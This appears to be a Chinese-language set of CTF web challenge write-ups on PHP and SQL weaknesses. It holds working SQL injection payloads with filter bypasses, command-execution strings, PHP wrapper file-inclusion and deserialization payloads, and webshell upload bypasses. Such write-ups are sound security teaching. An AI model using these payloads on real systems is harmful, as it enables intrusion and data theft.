[SWPUCTF 2021 新生赛]jicao
类型:PHP、代码审计、RCE
主要知识点:json_decode()函数
json_decode():对JSON字符串解码,转换为php变量
用法:
$json = {"ctf":"web","question":18};
var_dump(json_decode($json));
var_dump(json_decode($json, true));
?>
代码审计:
结果:
[SWPUCTF 2021 新生赛]easy_md5
类型:弱比较、PHP、数组绕过
主要知识点:md5弱比较、数组绕过
代码审计:
特殊字符串
某些特殊的字符串,加密后得到的密文以0e开头,PHP会当作科学计数法来处理,也就是0的n次方,得到的值比较的时候都相同。此时就是值不同但md5或sha1值相同
常见的密文以0e开头的字符串
md5:
240610708:0e462097431906509019562988736854
QLTHNDT:0e405967825401955372549139051580
QNKCDZO:0e830400451993494058024219903391
PJNPDWY:0e291529052894702774557631701704
NWWKITQ:0e763082070976038347657360817689
NOOPCJF:0e818888003657176127862245791911
MMHUWUV:0e701732711630150438129209816536
MAUXXQC:0e478478466848439040434801845361
sha1:
10932435112: 0e07766915004133176347055865026311692244
aaroZmOk: 0e66507019969427134894567494305185566735
aaK1STfY: 0e76658526655756207688271159624026011393
aaO8zKZF: 0e89257456677279068558073954252716165668
aa3OFF9m: 0e36977786278517984959260394024281014729
0e1290633704: 0e19985187802402577070739524195726831799
数组绕过
md5(),sha1()函数无法处理数组,如果传入的为数组,会返回NULL,两个数组经过加密后得到的都是NULL,也就是相等的。故传入两个不同的数组经md5()加密会返回为NULL
[SWPUCTF 2021 新生赛]include
类型:PHP伪协议、文件包含、PHP
主要知识点:php://filter伪协议
发现并没有上传文件的地方
尝试用php://filter伪协议过滤一下flag.php文件(一般flag都在flag.php中)
条件:
只需要读取,allow_url_fopen=on;allow_url_include=off
用法:
?file=php://fileter/read=<过滤器名称>/resource=<要过滤的文件(数据流)>
补充:
php://filter是一种元封装器:设计用于"数据流打开”时的"筛选过滤”应用,对本地磁盘文件进行读写,输出base64加密后的信息
convert.base64-encode:转换过滤器,用于过滤base64编码
扩展:
allow_url_fopen:配置选项,默认开启,决定了PHP 是否能够通过URL(而不是本地文件路径)来打开文件,为on时,fopen()和file_get_contents()等与文件操作相关的函数可以读取和写入远程文件
allow_url_include:配置选项,默认关闭,为on时,PHP 允许通过 URL 的形式,从远程服务器包含和执行PHP 文件
进入到 flag.php页面,发现一串base64编码,解码后即为flag
[SWPUCTF 2021 新生赛]easy_sql
类型:SQL注入
主要知识点:union联合注入
先用?id=1'尝试发现没变化这时发现网站标题叫“参数是wllm”,所以用?wllm=1'尝试,回显成功
用?wllm=1\判断闭合方式,发现是单引号注入
用union联合注入尝试
?wllm=-1' union select 1,2,3--+
回显成功
查询库
?wllm=-1' union select 1,2,database()--+
爆表
?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+
爆列
?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+
查看flag
?wllm=-1' union select 1,2,group_concat(flag) from test_tb--+
[SWPUCTF 2021 新生赛]easyrce
类型:RCE、PHP
主要知识点:RCE
直接?url=system("ls");
发现回显index.php文件,查看其目录?url=system("ls /");
发现目录中有疑似flag的内容,用?url=system("cat /flllllaaaaaaggggggg");查看
[第五空间 2021]WebFTP
类型:目录扫描、信息收集、.git泄露
主要知识点:dirsearch的使用
用bp抓包尝试爆破但发现需要还需要验证码爆破难度大所以应该不是弱口令爆破
用dirsearch扫描发现git泄露
进入查看
找了一圈没发现flag
重新看扫描结果发现有个phpinfo.php页面,进入ctrl+f搜索flag,得到flag
[SWPUCTF 2021 新生赛]babyrce
类型:空格绕过、RCE、Cookie注入
主要知识点:Cookie注入、shell_exec()绕过
修改cookie值为admin=1得到rasalghul.php文件
进入查看
代码审计:
将flag放入1.txt文件中,访问1.txt文件即可得到flag(但这题直接cat%09/f*就可以出来了不需要再访问1.txt文件)
[SWPUCTF 2021 新生赛]ez_unserialize
类型:反序列化、PHP
主要知识点:构造pop链
用御剑扫描
进入网页,发现一个php文件
访问
代码审计:
admin ="user";
$this->passwd = "123456";
}
public function __destruct(){
if($this->admin === "admin" && $this->passwd === "ctf"){
include("flag.php");
echo $flag; //目标
}else{
echo $this->admin;
echo $this->passwd;
echo "Just a bit more!";
}
}
}
$p = $_GET['p'];
unserialize($p);
?> 构造pop链,打开phpstorm
admin ="user";
// $this->passwd = "123456";
// }
//
// public function __destruct(){
// if($this->admin === "admin" && $this->passwd === "ctf"){
// include("flag.php");
// echo $flag;
// }else{
// echo $this->admin;
// echo $this->passwd;
// echo "Just a bit more!";
// }
// }
}
//$p = $_GET['p'];
//unserialize($p);
$w=new wllm();
$w->admin="admin";
$w->passwd="ctf";
echo serialize($w);
?> 输入/?p=O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}得到flag
[SWPUCTF 2021 新生赛]easyupload2.0
类型:文件上传、文件头绕过
主要知识点:不常用的php可执行文件后缀
需要提交jpg文件
用bp抓包 ,修改后缀,尝试双写绕过不可行,用其他php可执行文件的扩展名pht、phtml
用蚁剑连接,成功绕过
打开找flag
[SWPUCTF 2021 新生赛]easyupload1.0
类型:文件上传、MIME绕过、文件头绕过
主要知识点:前端绕过
需要提交jpg文件
用bp抓包修改后缀
连接蚁剑
打开找flag
但是发现这个flag是错误的
用phpinfo查看php服务器的配置信息
ctrl+f搜索flag
或者直接用蚁剑打开终端用env命令查看环境变量也可以发现flag
[SWPUCTF 2021 新生赛]no_wakeup
类型:反序列化、PHP
主要知识点:构造pop链、绕过_wakeup()
点进去查看
代码审计
admin ="user";
$this->passwd = "123456";
}
public function __wakeup(){
$this->passwd = sha1($this->passwd);
} //反序列化之前触发wakeup,给passwd赋值,导致passwd不等于wllm
public function __destruct(){
if($this->admin === "admin" && $this->passwd === "wllm"){
include("flag.php");
echo $flag; //目标
}else{
echo $this->passwd;
echo "No wake up";
}
}
}
$Letmeseesee = $_GET['p'];
unserialize($Letmeseesee);
?> 构造pop链
admin ="user";
// $this->passwd = "123456";
// }
// public function __wakeup(){
// $this->passwd = sha1($this->passwd);
// }
//
// public function __destruct(){
// if($this->admin === "admin" && $this->passwd === "wllm"){
// include("flag.php");
// echo $flag;
// }else{
// echo $this->passwd;
// echo "No wake up";
// }
// }
}
//
//$Letmeseesee = $_GET['p'];
//unserialize($Letmeseesee);
$h=new HaHaHa();
$h->admin="admin";
$h->passwd="wllm";
echo serialize($h);
?> 由于_wakeup()函数将wllm加密导致执行echo $this->passwd;echo "No wake up";
故需要绕过_wakeup(),变量数量大于真实的变量数量即可绕过_wakeup()的执行
[LitCTF 2023]PHP是世界上最好的语言!!
类型:RCE、PHP、无参RCE
提示:探姬坚信PHP是世界上最好的语言,于是她用PHP写了一个小工具 (Flag位于根目录)
主要知识点:命令注入
尝试点击发现旁边的空白可以输入,根据提示尝试命令注入
发现flag,用system("cat /flag");得到flag
[SWPUCTF 2021 新生赛]PseudoProtocols
类型:PHP伪协议、PHP、文件包含
主要知识点:php://filter伪协议、data伪协议
用php://filter/read=convert.base64-encode/resource=hint.php查看hint.php文件,发现一串base64代码
解码
访问test2222222222222.php
代码审计:
用php://input伪协议来获取POST数据,POST为I want flag发现没法查看
用data伪协议查看,得到flag
[LitCTF 2023]导弹迷踪
类型:JS分析、源码泄漏、信息收集
发现是一个游戏,查看源代码也没有什么东西,用御剑和dirsearch也没有扫出东西
直接在js文件里发现flag(一个一个文件找有点麻烦)
[NISACTF 2022]easyssrf
类型:PHP伪协议、PHP
主要知识点:file伪协议
尝试输入一个flag
用file:///fl4g查看/fl4g
访问ha1x1ux1u.php
扩展:
stristr()查找字符串在另一个字符串中第一次出现的位置。所以不能用?file=file:///flag
直接?file=/flag得到flag
[NCTF 2018]签到题
类型:HTTP协议、PHP、信息收集
进入后是一个百度页面,查看源码没找到flag,尝试删除secret.php,发现删除不掉,用bp抓包删除后发送发现flag
[BJDCTF 2020]easy_md5
类型:弱比较、数组绕过、PHP
主要知识点:md5(string,ture)函数
尝试提交个1,发现url处多了个?password=1
尝试sql注入但发现没有回显,感觉不是sql注入
用bp抓包看看,发现一句sql语句
md5()函数
语法:
md5(string,raw)
#string:要加密的字符串
#raw:默认不写是false,32位16进制字符串;如果是true,则会将输入值进行加密,然后转化为16位原始的二进制格式字符串
输入的值都被md5(string,true)函数转化为16位二进制,网上查找要怎么绕过,发现ffifdyop字符串会造成漏洞,md5('ffifdyop',true)=''or'6�]��!r,��b'。由于在mysql里面,在用作布尔型判断时,开头为1的字符串(被单引号包裹)会返回为整型数1(如果直接是数字1则不用单引号包裹),1是true。所以,简化后是password='' or 6,从而绕过md5(string,true)
输入ffifdyop后进入一个新页面
查看源代码
访问levell14.php,进入到数组绕过部分
在POST输入param1[]=1¶m2[]=2得到flag
[suctf 2019]EasySQL
类型:堆叠注入、SQL注入、关键字绕过
主要知识点:堆叠注入、猜测后端sql语句
输入1、2、3...尝试,都返回1
传入flag,尝试Union注入、报错注入、盲注,显示Nonono
尝试堆叠注入,发现可行
爆库
1;show databases;
爆表
1;show tables;
用select flag from Flag应该能得到flag但是flag被过滤了
法一:猜测后端查询语句
猜测后端为:
select $_POST['query'] || flag from Flag --||表示在Flag表中选择$_POST['query'] 和flag字段,并将它们连接起来作为结果的一部分
本题传入数字会回显1,而传入字符串则无回显,所以猜测可能有||结构存在且Flag表中应该有个flag列。当输入一串字符时||会将这串字符与flag连接起来作为结果,当这串字符和flag两列都存在时才能正确回显。假设输入一个abc,则在后端语句应该会变为:
select abc||flag from <表名>
当表中没有abc这列时则会返回#1054 - Unknown column 'abc' in 'field list'
构造payload:
如果我们输入*,1则后端查询语句会变为:
select *,1||flag from Flag; --查询Flag中所有列、常量1和flag列。将1与flag连接起来作为结果,由于数字是常量不会出现在查询结果中所以结果中只会有flag这列
传入*,1后得到flag
方法二:sql_mode
sql_mode:一组语法校验规则
| sql_mode的值 | 作用 |
| ONLY_FULL_GROUP_BY | 对于GROUP BY聚合操作,如果在SELECT中的列,没有在GROUP BY中出现,那么这个SQL是不合法的,因为列不在GROUP BY从句中 |
| NO_ZERO_DATE | mysql数据库不允许插入零日期,插入零日期会抛出错误而不是警告 |
| ERROR_FOR_DIVISION_BY_ZERO | 在insert或update过程中,如果数据被零除,则产生错误而非警告。如果未给出该模式,那么数据被零除时Mysql返回NULL |
| PIPES_AS_CONCAT | 将 || 视为字符串的连接操作符而非或运算符,这和Oracle数据库是一样是,也和字符串的拼接函数concat相类似 |
| ANSI_QUOTES | 不能用双引号来引用字符串,因为它被解释为识别符 |
设置sql_mode的值为PIPES_AS_CONCAT,则后端查询语句会变为:
select concat($_POST['query'],flag) from Flag
故构造payload:
1;set sql_mode=PIPES_AS_CONCAT;select 1
后端为:
select 1; set sql_mode=PIPES_AS_CONCAT; select concat(1,flag) from flag;
[ZJCTF 2019]NiZhuanSiWei
类型:反序列化、PHP伪协议、PHP
主要知识点:data伪协议、构造pop链
分析源码,用?text=data:text/plain,welcome to the zjctf&file=php://filter/read=convert.base64-encode/resource=useless.php进入查看useless.php内容
得到一串base64编码,解码后得到反序列化源码
file)){
echo file_get_contents($this->file);
echo "
";
return ("U R SO CLOSE !///COME ON PLZ");
}
}
}
?> 目标是访问到flag.php的内容
构造pop链
输入?text=data:text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}得到新界面
打开源代码发现flag
[SWPUCTF 2021 新生赛]easyupload3.0
类型:.htaccess、文件上传、MIME绕过
主要知识点:.htaccess
上传一句话木马jpg文件
打开bp抓包,修改后缀发现被过滤
尝试用双写绕过和不常用的php可执行文件后缀等都无法绕过
发现服务器是Apache
扩展:
.htaccess是apache的分布式配置文件,里面存放着Apache服务器配置相关的一些指令,通过写入SetHandler application/x-httpd-php,可以将上传的一句话木马的jpg文件以PHP的方式执行。
这时候尝试上传.htaccess进行绕过。
再次上传一次shell.jpg的一句话木马文件,此时打开蚁剑连接/upload/shell.jpg连接成功
打开找flag
[SWPUCTF 2021 新生赛]hardrce
类型:无字母RCE、RCE、WAF绕过
主要知识点:取反绕过、目录穿越
代码审计:
','\=','\`',];
foreach ($blacklist as $blackitem)
{
if (preg_match('/' . $blackitem . '/m', $wllm)) {
die("LTLT说不能用这些奇奇怪怪的符号哦!");
//$blacklist里的符号、/、/m被过滤了
}}
if(preg_match('/[a-zA-Z]/is',$wllm))
{
die("Ra's Al Ghul说不能用字母哦!");
//字母被过滤了
}
echo "NoVic4说:不错哦小伙子,可你能拿到flag吗?";
eval($wllm);//将$wllm转换为代码执行,并返回一个或多个值,通过命令注入获取flag
}
else
{
echo "蔡总说:注意审题!!!";
}
?> 蔡总说:注意审题!!! 用bp尝试用url编码绕过发现不行(浏览器直接自动解密了)
这时候想到可以利用取反绕过,构造payload:
运行得到
输入?wllm=(~%8C%86%8C%8B%9A%92)(~%93%8C);
利用目录穿越
输入得到,发现flllllaaaaaaggggggg
继续构造
输入得到flag
[SWPUCTF 2021 新生赛]error
类型:报错注入、SQL注入
主要知识点:判断注入方式、报错注入
根据页面应该使用sql注入
输入1\判断闭合符,为单引号闭合
尝试union注入,发现不可行
尝试报错注入
爆库:
1' and updatexml(1,concat(0x7e,(select database())),'1')#
//这题注释符好像不能用--+
报表:
1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='test_db')),'1')#
爆列:
1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='test_db' and table_name='test_tb')),'1')#
得到一半flag:
1' and updatexml(1,concat(0x7e,substring((select group_concat(flag) from test_tb),1,32)),1)#
得到另一半flag
1' and updatexml(1,concat(0x7e,substring((select group_concat(flag) from test_tb),31,32)),1)#
完整flag:NSSCTF{6f103e1b-68cd-4525-a609-856a71118fbc}
当然这题也可以用sqlmap直接梭哈
[SWPUCTF 2021 新生赛]pop
类型:反序列化、PHP、代码审计
主要知识点:pop链的构造、代码审计
admin === 'w44m' && $this->passwd ==='08067'){
include('flag.php');
echo $flag;//目标
}else{
echo $this->admin;
echo $this->passwd;
echo 'nono';
}
}
}
class w22m{
public $w00m;
public function __destruct(){
echo $this->w00m;
}
}
class w33m{
public $w00m;
public $w22m;
public function __toString(){
$this->w00m->{$this->w22m}();
return 0;
}
}
$w00m = $_GET['w00m'];
unserialize($w00m);
?> 代码审计:
要得到flag需要触发Getflag()并使admin=w44m,passwd=08067。由于admin是私有属性,passwd是受保护属性所以直接在类里赋值,所以我们需要的就是触发Getflag()。我们可以借助下面的类进行调用。
我们可以看到w33m类下面有一个调用w00m来调用w22m假设我们将w00m赋值为对象w44m()将w22m赋值为Getflag()那么就可以通过调用w44m类调用Getflag()从而达到目的,要触发$this->w00m->{$this->w22m}();需要触发__toString()触发时机为当将对象当作字符串时,w22m类中有一个echo $this->w00m将w00m赋值为对象new w33m()即可触发__toString()
构造payload:
admin === 'w44m' && $this->passwd ==='08067'){
// include('flag.php');
// echo $flag;
// }else{
// echo $this->admin;
// echo $this->passwd;
// echo 'nono';
// }
// }
}
class w22m{
public $w00m;
// public function __destruct(){
// echo $this->w00m;
// }
}
class w33m{
public $w00m;
public $w22m;
// public function __toString(){
// $this->w00m->{$this->w22m}();
// return 0;
// }
}
//$w00m = $_GET['w00m'];
//unserialize($w00m);
$w2 = new w22m();
$w2->w00m=new w33m();
$w2->w00m->w00m=new w44m();
$w2->w00m->w22m="Getflag";
echo urlencode(serialize($w2));
?> 由于私有属性和被保护属性有不可见字符所以需要urlencode,输入后得到flag
[SWPUCTF 2022 新生赛]ez_ez_php
类型:PHP伪协议、PHP、文件包含
substr(string, int a, int b);
#从第a位截取长度为b的字符串
substr(string, int a) ;
#从第a位截取后面所有的字符串
从第一位开始如果截取前3位为php则会触发echo "Nice!!!"; include($_GET["file"]);
基本没什么影响直接php://filter伪协议就行
解码
发现flag不在flag.php里真正的flag在flag里重新构造
解码 得到flag
[SWPUCTF 2021 新生赛]sql
类型:关键字绕过、空格绕过、SQL注入
想要我们输入东西但是并没有输入的位置,所以应该是在url中输入,网页名给出了参数是wllm,根据题目可知应该是sql注入
用?wllm=1\判断闭合符,为单引号闭合
尝试Union注入、报错注入、盲注,发现被禁止了且有根据页面应该有waf存在
先尝试看看注释符是否被过滤了用#发现不可行,用#的编码%23成功绕过
尝试空格是否被过滤,发现被过滤
尝试用url编码%20发现不可行,用%09发现可以绕过但是用?wllm=1‘%09group%09by%093%23无法判断出列数应该还有过滤,将'替换为url编码%27尝试,发现成功绕过判断出列数为3
开始union联合注入
?wllm=-1'%09union%09select%091,2,3%23
#这里-没有被过滤直接用就行
爆库
?wllm=-1'%09union%09select%091,2,database()%23
爆表
?wllm=-1%27%09union%09select%091,2,group_concat(table_name)%09from%09information_schema.tables%09where%09table_schema=%27test_db%27%23
发现不可行应该是过滤了=,用%09like%09尝试绕过,发现绕过成功
?wllm=-1%27%09union%09select%091,2,group_concat(table_name)%09from%09information_schema.tables%09where%09table_schema%09like%09%27test_db%27%23
爆列
?wllm=-1%27%09union%09select%091,2,group_concat(column_name)%09from%09information_schema.columns%09where%09table_name%09like%09%27LTLT_flag%27%23
爆flag
?wllm=-1%27%09union%09select%091,2,group_concat(flag)%09from%09LTLT_flag%23
发现不全,用substring连接试试,发现被过滤了
尝试用mid连接,成功绕过
?wllm=-1%27%09union%09select%091,2,mid(group_concat(flag),1,30)%09from%09LTLT_flag%23
发现只显示了20位,说明一次只会显示20位字符串,查看中间20位
?wllm=-1%27%09union%09select%091,2,mid(group_concat(flag),21,20)%09from%09LTLT_flag%23
查看最后几位
?wllm=-1%27%09union%09select%091,2,mid(group_concat(flag),41,20)%09from%09LTLT_flag%23
得到完整flag:NSSCTF{a36ebc2d-c62a-4c3a-a4ff-5d175b0cd860}
[LitCTF 2023]作业管理系统
类型:文件上传、弱口令、其他
主要知识点:文件上传
打开源代码查看发现默认用户为admin密码为admin(注意这题要是用爆破的话会被封禁环境就废了)
输入后登入
上传一句话木马文件
直接上传成功了
用蚁剑连接
找到flag
[SWPUCTF 2021 新生赛]finalrce
类型:无回显RCE、RCE、WAF绕过
发现exec()函数
exec 函数:exec 函数执行系统命令,并将输出存储到一个数组中,每一行命令输出作为数组的一个元素。它的返回值是命令的最后一行输出或者返回状态码。
可能是一题无回显的rce,需要用tee命令绕过
尝试一波发现怎么输入都没有回显exec()的返回值,确认是无回显rce
用?url= l\s | tee 1.txt,将回显值放入1.txt文件中(用\绕过waf)
访问1.txt
用?url=l\s / | tee 1.txt查看目录下的文件,发现疑似flag的文件
打开flllllaaaaaaggggggg,发现被过滤了
用\绕过
访问1.txt,得到flag
[鹏城杯 2022]简单包含
类型PHP:伪协议、文件包含、PHP
主要知识点:php://input伪协议、脏数据
发现需要POST传参,所以使用php://input伪协议,发现有waf
尝试获取当前页码的源码
flag=php://filter/read=convert.base64-encode/resource=index.php
解码得到
<?php
highlight_file(__FILE__);
include($_POST["flag"]);
//flag in /var/www/html/flag.php;
代码审计:
当php://input读取的内容的长度小于800时会回显nssctf waf!
所以php://input读取的内容的长度要大于800
利用脏数据,使得长度大于800
解码得到flag
[HDCTF 2023]Welcome To HDCTF 2023
类型:JS分析、信息收集、源码泄漏
主要知识点:JSUnFuck编码
打开源代码
查看game.js文件,发现secret=一串JSUnFuck编码,很可疑解码看看
解码得到flag
[鹤城杯 2021]EasyP
类型:PHP、正则绕过、文件包含
代码审计: